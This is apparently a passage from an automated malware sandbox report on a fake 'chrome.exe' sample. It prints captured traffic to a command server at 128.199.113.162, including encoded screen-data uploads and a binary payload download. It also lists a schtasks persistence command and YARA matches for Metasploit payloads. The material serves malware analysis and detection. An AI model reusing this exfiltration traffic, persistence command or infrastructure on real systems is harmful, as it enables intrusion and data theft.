                Data Ascii: Name=screen&dataFile=F8%2fd%2fH5JXeZMAkL0t02ZP9nVsz1YeH4qDR82TtRkcPS3A17i%2bD%2beW8jcCw6IhZeNxNXbLBuckFSTLXcT0TBTELYT249rzoZccVvKn3BKa84Bl0yNZZKK%2fQgIEGLedQypBDeGREnjjvcQbVDqHwI0PUvDqIl6p9YxSYhAW8GjzftgCWUCtaPMqPnB1KZrrLkLdbaUyC94jbjy0dh1ascf
                Jul 11, 2023 15:47:15.991466999 CEST38OUTData Raw: 49 49 6c 31 46 63 55 48 6c 6e 44 57 57 77 4f 68 75 25 32 66 4b 63 61 4b 57 50 77 4b 33 52 47 52 78 55 78 72 6b 69 61 71 71 35 79 30 58 6b 54 44 4f 4b 4e 46 4a 71 51 65 67 4e 39 49 36 57 33 54 56 31 5a 41 36 5a 4a 4b 57 46 73 77 63 54 4c 64 62 76
                Data Ascii: IIl1FcUHlnDWWwOhu%2fKcaKWPwK3RGRxUxrkiaqq5y0XkTDOKNFJqQegN9I6W3TV1ZA6ZJKWFswcTLdbvfJR8IOrJeuez%2bPhD%2f803YP5s0zVtDIg3fFK3sVLo8yFOlzDDNB80YZAqRn2mo2N3WHGxKPg%2f7Kah6Sy20X9%2bgMJ6b%2f%2f2yjyKZs6sOVu9kfHPf2kmyoT4HeQo4U06l1GBO7HaIneJBbmTeFjqnv8IQ
                Jul 11, 2023 15:47:16.198899031 CEST79OUTData Raw: 67 33 58 44 77 66 4c 74 68 75 4a 31 6b 4a 70 66 6b 31 67 30 52 70 44 6f 30 35 35 59 7a 73 59 67 55 69 25 32 66 4e 6b 7a 54 32 43 65 46 78 64 37 6e 66 61 32 32 33 64 78 7a 48 72 41 49 37 46 52 74 6a 25 32 66 4e 6d 74 32 61 61 49 45 75 6e 54 46 43
                Data Ascii: g3XDwfLthuJ1kJpfk1g0RpDo055YzsYgUi%2fNkzT2CeFxd7nfa223dxzHrAI7FRtj%2fNmt2aaIEunTFCIosGBg%2bBbUEUQgZ3NtRv38%2bh7KHx%2bPUORgUqS%2fPmOYy8AGeWl%2bhc8expVpMOgxMk%2bgzZDd4HchrZ43wYKHbhDUoBZtHJM8FO3r%2fdL93FN5JyD9wA2V%2fgKcQlhkq2vRXo2wD8yM7lvTI3UvV%2
                Jul 11, 2023 15:47:16.198977947 CEST89OUTData Raw: 74 4c 31 79 79 42 4a 63 6d 50 57 6a 68 71 58 4f 52 79 65 50 43 49 31 41 78 67 59 74 74 35 69 61 78 4c 76 6c 68 72 68 66 33 6a 64 52 45 43 55 43 43 37 70 62 73 4d 50 35 6d 6e 51 31 4e 72 6b 51 34 44 4f 31 44 79 54 50 71 6e 4d 72 72 41 51 58 55 65
                Data Ascii: tL1yyBJcmPWjhqXORyePCI1AxgYtt5iaxLvlhrhf3jdRECUCC7pbsMP5mnQ1NrkQ4DO1DyTPqnMrrAQXUe6vD%2bBnySEitCJ7%2fGU5hu3jLvDjxflJ3CXaZXA9PdBFvFgmRxcWv5enPe2FTvvbqIBTlQArFqxQMtjZIq9bsSbZZ%2fxoubb%2frpwzNdu9JvJdRNeGn0uwOTsbzDgK1llTSx%2fT3I3AQfVwc3kY5HdW461or
                Jul 11, 2023 15:47:16.393913031 CEST126OUTData Raw: 35 32 66 55 6b 25 32 62 62 4d 34 4f 45 76 6b 61 35 65 4d 34 61 6d 35 7a 64 52 52 5a 4f 78 6d 56 53 70 68 63 31 47 55 75 7a 50 50 4c 6d 69 63 45 4a 44 65 71 55 62 66 30 32 72 61 52 31 4e 73 6b 65 56 35 49 32 49 69 67 47 79 50 42 34 32 25 32 66 55
                Data Ascii: 52fUk%2bbM4OEvka5eM4am5zdRRZOxmVSphc1GUuzPPLmicEJDeqUbf02raR1NskeV5I2IigGyPB42%2fUiy6a6y0wunOCEewIIUb8v%2bnfiqyhViY%2bJ40%2f1hijf2kK87hiwzwhoIlirjNBm%2bO0AjKrwZWdS2zhz9xPQXRy%2blfxa2aJJFxBjsoyyOfakSGsIqQvREVVY0Vptk6lJNg5E4mYIGmwvBzz4LtRNES%2fY
                Jul 11, 2023 15:47:16.816745043 CEST127INHTTP/1.1 200 OK
                Date: Tue, 11 Jul 2023 13:47:15 GMT
                Server: Apache/2.4.41 (Ubuntu)
                Content-Length: 4
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Data Raw: 38 3d 3d 33
                Data Ascii: 8==3
                Jul 11, 2023 15:47:16.962865114 CEST127OUTGET /upwawsfrg.php?zd=1 HTTP/1.1
                Cookie: SESSION=sk0BQxQ2ecV2G3vGgHWpaob42l7VzA0Ga2MQH7oMEZPHd3mlpReiee7/PjezuaCviICVEg==
                User-Agent: Mozilla / 5.0(Windows NT 10.0; Win64; x64; rv: 108.0) Gecko / 20100101 Firefox / 108.0
                Host: 128.199.113.162
                Jul 11, 2023 15:47:17.370687008 CEST127INHTTP/1.1 200 OK
                Date: Tue, 11 Jul 2023 13:47:17 GMT
                Server: Apache/2.4.41 (Ubuntu)
                Content-Description: File Transfer
                Content-Disposition: attachment; filename=asedxtg.bin
                Content-Transfer-Encoding: binary
                Expires: 0
                Cache-Control: must-revalidate, post-check=0, pre-check=0
                Pragma: public
                Content-Length: 9560
                Content-Type: application/octet-stream
                Jul 11, 2023 15:47:17.370728970 CEST129INData Raw: 70 55 32 79 48 48 31 5a 46 36 41 42 52 45 4c 31 53 62 4f 5a 58 32 47 31 73 7a 32 6e 6f 33 35 70 54 52 63 77 53 4e 4e 69 64 66 79 77 42 46 6e 72 38 54 65 55 56 39 7a 52 42 77 57 44 69 59 36 66 31 39 72 50 4d 51 47 44 6a 6b 6d 4a 4d 57 73 7a 50 52
                Data Ascii: pU2yHH1ZF6ABREL1SbOZX2G1sz2no35pTRcwSNNidfywBFnr8TeUV9zRBwWDiY6f19rPMQGDjkmJMWszPR50MJogQp13Uri4fNP654lfIIFR2VTPK9Peu1ua6wH8GmvPeRvvLXGc9oECJSLraX9VLxSe/t5mmOkJX7pyafOR/8lrH0bt+tSBFLa2mRok2/S3HQeidGMPwAS9ppTJJ7CfC+R1WQ0fOiu2FJHPm6o0sEcv2xnv12b
                Jul 11, 2023 15:47:17.370748997 CEST130INData Raw: 2b 42 46 35 79 4f 77 76 57 72 58 31 42 33 42 4a 43 6c 39 6a 77 61 72 71 4c 6d 55 4a 69 68 69 70 62 36 33 4e 37 4a 50 31 49 4a 42 48 49 51 78 65 53 6a 42 4d 38 42 75 44 63 45 78 33 41 50 71 53 6d 71 65 48 65 54 33 66 63 63 64 42 33 70 36 4b 36 70
                Data Ascii: +BF5yOwvWrX1B3BJCl9jwarqLmUJihipb63N7JP1IJBHIQxeSjBM8BuDcEx3APqSmqeHeT3fccdB3p6K6pvDP/fzRjtDn5ufYm7Rt7RHRDeSnugRjZaweZtgBWJeZc4QTUgY8dR2BOqRRB/BLjZe52vfCkoDVQNxUnH/AUxonG2SCHP7jTmoOyPeFsi8sfX6zuDgoh1Ww8rCEfmJKAbzGnqhZElp0v2hxrGKWb/qdHX/t/7d1cJ
                Jul 11, 2023 15:47:17.370767117 CEST131INData Raw: 6b 42 5a 78 68 68 72 34 6c 4e 44 50 78 34 72 45 37 2f 65 49 52 38 2b 6d 35 33 43 57 39 7a 6b 7a 75 49 4e 59 76 4d 31 48 5a 58 48 4e 50 71 73 7a 6e 69 39 55 48 58 7a 5a 56 54 70 67 6b 77 39 35 64 2f 4f 67 49 68 6e 56 4e 78 43 61 59 30 70 64 43 4b
                Data Ascii: kBZxhhr4lNDPx4rE7/eIR8+m53CW9zkzuINYvM1HZXHNPqszni9UHXzZVTpgkw95d/OgIhnVNxCaY0pdCKKfr385jttaiyeBQzwMMy+saMLlFK1YeUopRqXWYPUrx/CrKejsthgdzoFmeSbNLHBcEnkayToSDbyq19qAU5gcssCVPzPCDobE8/au2varo9ycHok4/O+A5Qezsu7d3KqYrZ/8d156IVsEEEM72MX1y2w9c71rABv
                Jul 11, 2023 15:47:17.370786905 CEST133INData Raw: 78 35 54 52 58 4e 35 4e 68 52 65 4e 64 71 45 69 32 7a 59 52 66 46 6c 42 34 43 35 4d 75 4e 6d 56 35 41 38 4d 70 62 4b 68 37 76 56 5a 46 77 4f 4c 49 55 7a 6b 32 78 6d 30 4b 6f 56 73 52 35 6f 45 34 51 57 6a 41 74 37 46 74 64 38 6b 65 32 71 44 77 63
                Data Ascii: x5TRXN5NhReNdqEi2zYRfFlB4C5MuNmV5A8MpbKh7vVZFwOLIUzk2xm0KoVsR5oE4QWjAt7Ftd8ke2qDwcpnphFmYtXulCCQWTxHEDA123BTpwotDn8ULXON7T4jQDqSNFOkEu4+KwyDkVNE/0SGAkmJuR+gSGBGCF6fv9luPR8bpYQ1ZD4jzOMWUZuZWAKDN1GGvKGUEmpcqaeaRyd+PJGsYT2m9oSa77+x/N884a0OknjUv9K
                Jul 11, 2023 15:47:17.370805025 CEST134INData Raw: 32 6b 51 4d 66 51 68 4f 67 7a 49 67 54 57 6c 45 6f 35 71 47 55 65 56 58 70 58 66 5a 7a 73 52 48 54 74 58 62 4f 69 41 46 35 63 63 30 68 47 69 67 55 52 55 75 33 65 65 59 52 58 54 34 54 5a 46 6a 37 59 41 44 63 39 6a 4a 71 65 78 6f 44 35 7a 44 39 6f
                Data Ascii: 2kQMfQhOgzIgTWlEo5qGUeVXpXfZzsRHTtXbOiAF5cc0hGigURUu3eeYRXT4TZFj7YADc9jJqexoD5zD9osHhWOgQtrHfBmm8hln/P34VdKPIZRPxgEAe5lVaB7v+x+A+8gjhnPp3cyjiy3iIIaQ40DUUr6IllBaX0sfS5hMjsj7R+f3nJ5NzwLbxxqMQAeusG3qw9nx4giVC9bBwz87B6ILhOxthX0PzwAeGehLch6HBQSTqYT
                Jul 11, 2023 15:47:17.370822906 CEST135INData Raw: 73 55 6f 50 5a 62 64 64 39 6e 39 33 78 38 44 74 59 58 4b 54 32 6f 4b 47 68 67 68 36 77 2b 55 58 66 68 6a 45 6f 6b 38 2b 4c 6e 77 31 79 71 53 69 6a 74 33 66 41 4d 4b 52 46 7a 6f 7a 4e 62 38 6a 6c 38 35 32 4b 53 67 4b 30 49 63 33 69 75 39 36 77 4e
                Data Ascii: sUoPZbdd9n93x8DtYXKT2oKGhgh6w+UXfhjEok8+Lnw1yqSijt3fAMKRFzozNb8jl852KSgK0Ic3iu96wNiIM1MWcoTzfhcDeY/4tnUc8w7Fjz5haxD2RR8RrQ41CYvbtGiP+wBPfyVR4MlpthhdCZuv0Fk0bhse4KRloTFuRmCfq5J2FxuoQNwMwtuvgQFXKzJi1F4jAz4YuficZKu1trHFtZytfoKHx07qNf/AZaAsNG8K2NX
                Jul 11, 2023 15:47:17.370841980 CEST137INData Raw: 6b 6a 43 79 45 4f 49 62 39 66 67 69 48 52 4e 52 56 66 4c 43 39 32 4c 5a 56 38 4a 59 34 48 57 6e 30 31 72 56 6b 69 47 37 4d 56 52 7a 62 2b 6b 67 65 7a 6c 72 33 78 67 2f 62 67 57 2b 74 65 36 4f 45 51 42 75 75 62 79 6a 68 6b 43 71 7a 57 4b 59 50 4b
                Data Ascii: kjCyEOIb9fgiHRNRVfLC92LZV8JY4HWn01rVkiG7MVRzb+kgezlr3xg/bgW+te6OEQBuubyjhkCqzWKYPKjZ66A7y38kaKHEyyRG2jMVThe/ujIUAzvibmaKelRzMY7Rtpba5kdnnRnOtTov9+/ItWWlWXJqvX/LmHz6ZYniua24NyEVVBPP28XQL8eJQClPNMjXfODYAFZ9qm/d1UpAvDNssMIj8gE4iHxlcAEbe1A1ONOGEpK
                Jul 11, 2023 15:47:17.370857954 CEST137INData Raw: 6d 47 4f 2b 78 35 72 30 78 55 59 7a 38 4f 6d 43 4b 35 51 46 6d 36 74 2f 73 75 64 73 45 79 69 6d 38 62 4e 65 43 68 62 35 55 34 6e 2f 37 51 69 48 62 56 36 6e 77 49 46 6f 51 4c 4d 54 70 30 52 57 31 64 50 79 75 59 31 63 70 42 49 45 79 79 4a 4b 37 56
                Data Ascii: mGO+x5r0xUYz8OmCK5QFm6t/sudsEyim8bNeChb5U4n/7QiHbV6nwIFoQLMTp0RW1dPyuY1cpBIEyyJK7VT9DbV9pMJXm4+fQMqi5aVwDBuU3skYTw235qoqyenvGy3CBZ94Fw5ncq1nMbKFF9zd0ApJWO7LY82ljyAezG6vxJEgFdVw+sxTcbqwxzIM+yqqP3bsNGu4xYcPdlsEThLD3zGJMktAB/j5dPuolNJQw4XN/+Tk/zd


                Session IDSource IPSource PortDestination IPDestination PortProcess
                1192.168.2.449692128.199.113.16280C:\Users\user\Desktop\chrome.exe
                TimestampkBytes transferredDirectionData
                Jul 11, 2023 15:47:22.173682928 CEST138OUTPOST /upwawsfrg.php HTTP/1.1
                Cookie: SESSION=sk0BQxQ2ecV2G3vGgHWpaob42l7VzA0Ga2MQH7oMEZPHd3mlpReiee7/PjezuaCviICVEg==
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla / 5.0(Windows NT 10.0; Win64; x64; rv: 108.0) Gecko / 20100101 Firefox / 108.0
                Host: 128.199.113.162
                Content-Length: 119627
                Expect: 100-continue
                Connection: Keep-Alive
                Jul 11, 2023 15:47:22.345010042 CEST138INHTTP/1.1 100 Continue
                Jul 11, 2023 15:47:22.348160982 CEST143OUTData Raw: 4e 61 6d 65 3d 73 63 72 65 65 6e 26 64 61 74 61 46 69 6c 65 3d 46 38 25 32 66 64 25 32 66 48 35 4a 58 65 5a 4d 41 6b 4c 30 74 30 32 5a 50 39 6e 56 73 7a 31 59 65 48 34 71 44 52 38 32 54 74 52 6b 63 50 53 33 41 31 37 69 25 32 62 44 25 32 62 65 57
                Data Ascii: Name=screen&dataFile=F8%2fd%2fH5JXeZMAkL0t02ZP9nVsz1YeH4qDR82TtRkcPS3A17i%2bD%2beW8jcCw6IhZeNxNXbLBuckFSTLXcT0TBTELYT249rzoZccVvKn3BKa84Bl0yNZZKK%2fQgIEGLedQypBDeGREnjjvcQbVDqHwI0PUvDqIl6p9YxSYhAW8GjzftgCWUCtaPMqPnB1KZrrLkLdbaUyC94jbjy0dh1ascf
                Jul 11, 2023 15:47:22.519557953 CEST151OUTData Raw: 4c 54 34 55 64 76 66 32 37 62 62 6c 33 30 32 59 62 56 5a 63 36 62 71 43 4d 37 58 4a 5a 4a 49 49 5a 47 74 4a 41 59 37 35 70 5a 76 77 4d 41 50 5a 35 77 69 41 79 41 36 69 35 57 56 4b 64 65 34 43 6d 44 49 4a 32 47 59 78 61 53 4e 44 41 4a 6d 79 4c 52
                Data Ascii: LT4Udvf27bbl302YbVZc6bqCM7XJZJIIZGtJAY75pZvwMAPZ5wiAyA6i5WVKde4CmDIJ2GYxaSNDAJmyLRkNFb3rWfjkw4%2fnz8OLgSb2UAbf8uTI7TMQP2ZKGVIci2bfjNvdbplHewlSE07D%2b2QKARgR4yN1je%2fGPccDtS36peB3b6M10IysMlN4h7yK0U2ESckf5ZMPiLXXkQo9%2f4WNA3Ft6GwNJaSSYO5uWzJcGSj
                Jul 11, 2023 15:47:22.519619942 CEST154OUTData Raw: 49 49 6c 31 46 63 55 48 6c 6e 44 57 57 77 4f 68 75 25 32 66 4b 63 61 4b 57 50 77 4b 33 52 47 52 78 55 78 72 6b 69 61 71 71 35 79 30 58 6b 54 44 4f 4b 4e 46 4a 71 51 65 67 4e 39 49 36 57 33 54 56 31 5a 41 36 5a 4a 4b 57 46 73 77 63 54 4c 64 62 76
                Data Ascii: IIl1FcUHlnDWWwOhu%2fKcaKWPwK3RGRxUxrkiaqq5y0XkTDOKNFJqQegN9I6W3TV1ZA6ZJKWFswcTLdbvfJR8IOrJeuez%2bPhD%2f803YP5s0zVtDIg3fFK3sVLo8yFOlzDDNB80YZAqRn2mo2N3WHGxKPg%2f7Kah6Sy20X9%2bgMJ6b%2f%2f2yjyKZs6sOVu9kfHPf2kmyoT4HeQo4U06l1GBO7HaIneJBbmTeFjqnv8IQ
                Jul 11, 2023 15:47:22.690756083 CEST164OUTData Raw: 72 62 77 68 46 76 5a 36 48 58 72 51 46 25 32 66 7a 56 67 4d 4c 30 30 44 36 31 6a 65 62 72 77 63 54 6e 6e 54 32 69 39 4d 46 56 78 35 39 77 63 54 78 4b 33 64 66 64 4c 25 32 66 4c 6b 62 51 31 38 37 66 73 6c 7a 39 52 57 65 62 78 41 62 68 4f 70 77 68
                Data Ascii: rbwhFvZ6HXrQF%2fzVgML00D61jebrwcTnnT2i9MFVx59wcTxK3dfdL%2fLkbQ187fslz9RWebxAbhOpwhCMKGrK7HHvvxDIW3A3q1dT8KxNYvf6DlnUCRCgl4dLR3srnTZJm6IMKog%2bj61QkjdnHQh%2fa52Qw8Z72tELN8SdiF6wogXS6MlAhFvYkxpnd%2bI%2bsiC%2fYZdbt1OQqD4DE9k%2fvUC6m%2bKQwCczCmYRL
                Jul 11, 2023 15:47:22.690809011 CEST169OUTData Raw: 74 57 66 73 64 73 42 46 36 36 4a 78 25 32 66 30 6e 4c 53 34 70 6d 25 32 66 52 68 41 68 79 78 5a 53 42 51 55 78 32 53 25 32 66 6c 7a 53 69 51 53 7a 31 4f 64 76 4e 30 52 38 69 56 57 38 31 62 57 46 62 30 72 36 31 47 4c 51 34 61 5a 4b 78 43 41 4b 76
                Data Ascii: tWfsdsBF66Jx%2f0nLS4pm%2fRhAhyxZSBQUx2S%2flzSiQSz1OdvN0R8iVW81bWFb0r61GLQ4aZKxCAKvHu3iwAix6K78AdqC%2fMM9OSl43nkZIx5BeGXSnRjLfY6vOKgxIqp8%2bbGdnWgGNW52Gr%2bg92r%2fvMx2ocOCn1p%2bmEGqiX2uDBxRPQHDlivQLMmDK0p7gNKEyXB1EGnKjwCMsCB%2fC%2bGA69XYvKvzlUz
                Jul 11, 2023 15:47:22.690809011 CEST174OUTData Raw: 4d 34 58 38 25 32 66 59 64 39 73 4b 43 4d 52 6d 5a 50 78 54 47 79 74 74 4f 25 32 66 6a 34 6d 50 56 39 74 25 32 62 6f 73 4a 78 30 51 77 43 79 34 6a 51 56 36 71 56 68 4c 69 69 4a 6b 42 39 79 59 52 71 58 56 41 46 39 4b 6f 63 58 55 57 6b 6d 36 78 68
                Data Ascii: M4X8%2fYd9sKCMRmZPxTGyttO%2fj4mPV9t%2bosJx0QwCy4jQV6qVhLiiJkB9yYRqXVAF9KocXUWkm6xh%2fYe3WwpF1i1Lk5FfcgD%2byUonuNxWYnqcWDA3h%2bCIG0u7IBeqt4f6luG9%2bIAYR4jN%2b%2fLCZh1le3CAT5ahRcnsLQAzhYXdUeCHntXeixbigRWYEFFiihW0xDGgs96ag%2fKVMklc2pfxHfPqUgxwzGD
                Jul 11, 2023 15:47:22.861896038 CEST177OUTData Raw: 68 69 6c 58 32 49 4a 51 30 68 75 70 5a 71 35 6c 44 25 32 62 25 32 66 57 25 32 66 6f 6b 57 50 6c 25 32 66 6c 6f 56 4e 42 65 38 4e 73 39 25 32 66 54 77 39 4b 53 38 57 46 4d 62 48 50 44 34 78 71 49 42 57 6d 73 4e 76 30 47 33 53 55 7a 67 70 45 67 74
                Data Ascii: hilX2IJQ0hupZq5lD%2b%2fW%2fokWPl%2floVNBe8Ns9%2fTw9KS8WFMbHPD4xqIBWmsNv0G3SUzgpEgtbQ0S5n7hqd3h4zPk7nnhIL79YPxNckzNKnGs5rV%2fTFxMNFjByMxgW6O7zkV%2fWFcDX2GfVINFBvcnmGJYOspZN14G0sa1nZNghxbCV2E6NTCwwBcCL34QOgPqnYRrvjnyo2qNvWvhzigLaHybAFfls8BOsnhyt
                Jul 11, 2023 15:47:22.861996889 CEST190OUTData Raw: 67 33 58 44 77 66 4c 74 68 75 4a 31 6b 4a 70 66 6b 31 67 30 52 70 44 6f 30 35 35 59 7a 73 59 67 55 69 25 32 66 4e 6b 7a 54 32 43 65 46 78 64 37 6e 66 61 32 32 33 64 78 7a 48 72 41 49 37 46 52 74 6a 25 32 66 4e 6d 74 32 61 61 49 45 75 6e 54 46 43
                Data Ascii: g3XDwfLthuJ1kJpfk1g0RpDo055YzsYgUi%2fNkzT2CeFxd7nfa223dxzHrAI7FRtj%2fNmt2aaIEunTFCIosGBg%2bBbUEUQgZ3NtRv38%2bh7KHx%2bPUORgUqS%2fPmOYy8AGeWl%2bhc8expVpMOgxMk%2bgzZDd4HchrZ43wYKHbhDUoBZtHJM8FO3r%2fdL93FN5JyD9wA2V%2fgKcQlhkq2vRXo2wD8yM7lvTI3UvV%2
                Jul 11, 2023 15:47:22.862067938 CEST212OUTData Raw: 6b 4c 43 52 39 41 66 53 52 4d 36 30 78 64 56 6b 73 59 49 78 37 6c 4e 61 6a 38 33 25 32 62 7a 4e 56 42 54 4c 6a 4a 43 56 6f 6f 25 32 62 65 78 59 56 6b 72 6e 48 63 66 67 58 35 45 79 34 4d 71 65 79 67 69 38 75 63 25 32 62 54 6b 61 4f 70 56 4f 7a 77
                Data Ascii: kLCR9AfSRM60xdVksYIx7lNaj83%2bzNVBTLjJCVoo%2bexYVkrnHcfgX5Ey4Mqeygi8uc%2bTkaOpVOzwIE19Q3WuZk%2bcfcUN%2fPgxrkDynhMlWr8RyFN2b9%2ffZdx7QQNte1mZFZYIiXeZ49BUecTaaVN4wHymJXA75%2bG%2bSCwMfWKSqxXtyTf217uu23x6ASfGQvhCUPlHMV11c61VPAsgbwgpC0Q4ECZfMR3B7mx
                Jul 11, 2023 15:47:22.903913021 CEST215OUTData Raw: 66 50 41 68 35 32 39 44 5a 36 72 56 6c 78 71 50 44 69 75 44 65 70 79 78 6e 61 62 76 70 79 47 59 35 48 33 76 36 6c 52 38 4c 33 71 32 39 31 71 49 33 4d 41 70 56 52 77 79 6a 63 47 56 45 73 6d 65 74 32 35 6a 49 48 6f 50 6d 4c 32 35 68 70 79 34 33 76
                Data Ascii: fPAh529DZ6rVlxqPDiuDepyxnabvpyGY5H3v6lR8L3q291qI3MApVRwyjcGVEsmet25jIHoPmL25hpy43vhZHL%2fAh2KVyt%2bECjHTDPOOBTMFxWh6hpH1UvyNALYJgiwE3nTFaZvF2%2bfXiKbPsG9xynshI1W9d5h7PZeBl1ZlebtU1xxFntUQ0Lgocu6zKxlY9RMYKzXfDxZ4Tm1PhOP0N%2fm5qFjBNpPU5hsG9Nwl4rF
                Jul 11, 2023 15:47:23.434360981 CEST259INHTTP/1.1 200 OK
                Date: Tue, 11 Jul 2023 13:47:22 GMT
                Server: Apache/2.4.41 (Ubuntu)
                Content-Length: 0
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:15:47:08
                Start date:11/07/2023
                Path:C:\Users\user\Desktop\chrome.exe
                Wow64 process (32bit):false
                Commandline:C:\Users\user\Desktop\chrome.exe
                Imagebase:0x271552d0000
                File size:1'142'288 bytes
                MD5 hash:B2EAF44F5D0EA664E504C9C8C6C42D23
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.563398385.0000027156F92000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.563398385.0000027156F92000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Metasploit_91bc5d7d, Description: unknown, Source: 00000000.00000002.563398385.0000027156F92000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.563398385.000002715726C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.563398385.000002715726C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Metasploit_91bc5d7d, Description: unknown, Source: 00000000.00000002.563398385.000002715726C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                Reputation:low

                General

                Target ID:2
                Start time:15:47:12
                Start date:11/07/2023
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:"schtasks.exe" /query /TN WinTask
                Imagebase:0x7ff6f0670000
                File size:226'816 bytes
                MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Target ID:3
                Start time:15:47:12
                Start date:11/07/2023
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7c72c0000
                File size:625'664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Target ID:4
                Start time:15:47:13
                Start date:11/07/2023
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\schtasks.exe" /create /tn WinTask /tr C:\Users\user\Desktop\chrome.exe /sc minute /mo 5
                Imagebase:0x7ff6f0670000
                File size:226'816 bytes
                MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Target ID:5
                Start time:15:47:13
                Start date:11/07/2023
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7c72c0000
                File size:625'664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Target ID:6
                Start time:15:47:13
                Start date:11/07/2023
                Path:C:\Users\user\Desktop\chrome.exe
                Wow64 process (32bit):false
                Commandline:C:\Users\user\Desktop\chrome.exe
                Imagebase:0x1f074240000
                File size:1'142'288 bytes
                MD5 hash:B2EAF44F5D0EA664E504C9C8C6C42D23
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:.Net C# or VB.NET
                Reputation:low

                General

                Target ID:7
                Start time:15:47:16
                Start date:11/07/2023
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:"schtasks.exe" /query /TN WinTask
                Imagebase:0x7ff6f0670000
                File size:226'816 bytes
                MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Target ID:8
                Start time:15:47:16
                Start date:11/07/2023
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7c72c0000
                File size:625'664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language

                General

                Target ID:9
                Start time:15:47:17
                Start date:11/07/2023
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\schtasks.exe" /create /tn WinTask /tr C:\Users\user\Desktop\chrome.exe /sc minute /mo 5
                Imagebase:0x7ff6f0670000
                File size:226'816 bytes
                MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language

                General

                Target ID:10
                Start time:15:47:17
                Start date:11/07/2023
                Path:C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe
                Wow64 process (32bit):false
                Commandline:"C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe"
                Imagebase:0x140000000
                File size:7'168 bytes
                MD5 hash:468F9575A65D99F52FA2B52C505F59A6
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000000A.00000002.811405642.0000000140004000.00000080.00000001.01000000.00000008.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 0000000A.00000002.811405642.0000000140004000.00000080.00000001.01000000.00000008.sdmp, Author: unknown
                • Rule: Windows_Trojan_Metasploit_91bc5d7d, Description: unknown, Source: 0000000A.00000002.811405642.0000000140004000.00000080.00000001.01000000.00000008.sdmp, Author: unknown
                • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000000A.00000000.562738521.0000000140004000.00000080.00000001.01000000.00000008.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 0000000A.00000000.562738521.0000000140004000.00000080.00000001.01000000.00000008.sdmp, Author: unknown
                • Rule: Windows_Trojan_Metasploit_91bc5d7d, Description: unknown, Source: 0000000A.00000000.562738521.0000000140004000.00000080.00000001.01000000.00000008.sdmp, Author: unknown
                • Rule: JoeSecurity_MetasploitPayload_2, Description: Yara detected Metasploit Payload, Source: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe, Author: Joe Security
